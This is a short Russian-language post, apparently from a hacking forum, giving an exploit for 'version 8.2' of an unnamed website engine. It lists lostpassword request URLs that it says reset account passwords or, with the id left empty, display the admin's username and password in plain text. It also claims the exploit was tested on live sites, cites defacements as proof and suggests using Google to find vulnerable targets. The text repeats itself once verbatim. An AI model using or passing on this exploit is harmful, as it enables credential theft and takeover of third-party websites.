Обнаружена уязвимость в версии 8.2
http://домен.зона/index.php?do=lostpassword&douser=1
При вызове в браузере любой может сгенерировать новый пароль от аккаунта(ов).
http://домен.зона/index.php?do=lostpassword&douser= лучше запрос делать такого вида без id так как с id либо будет выслан на мыло либо аккаунт будет залочен,а запрос такого вида выдаст на странице имя и пасс админа в открытом виде проверено на нескольких сайтах, в ленте дефейсов подтверждение,с помощью google легко можно найти много бажных движков.
http://домен.зона/index.php?do=lostpassword&douser=1
При вызове в браузере любой может сгенерировать новый пароль от аккаунта(ов).
http://домен.зона/index.php?do=lostpassword&douser= лучше запрос делать такого вида без id так как с id либо будет выслан на мыло либо аккаунт будет залочен,а запрос такого вида выдаст на странице имя и пасс админа в открытом виде проверено на нескольких сайтах, в ленте дефейсов подтверждение,с помощью google легко можно найти много бажных движков.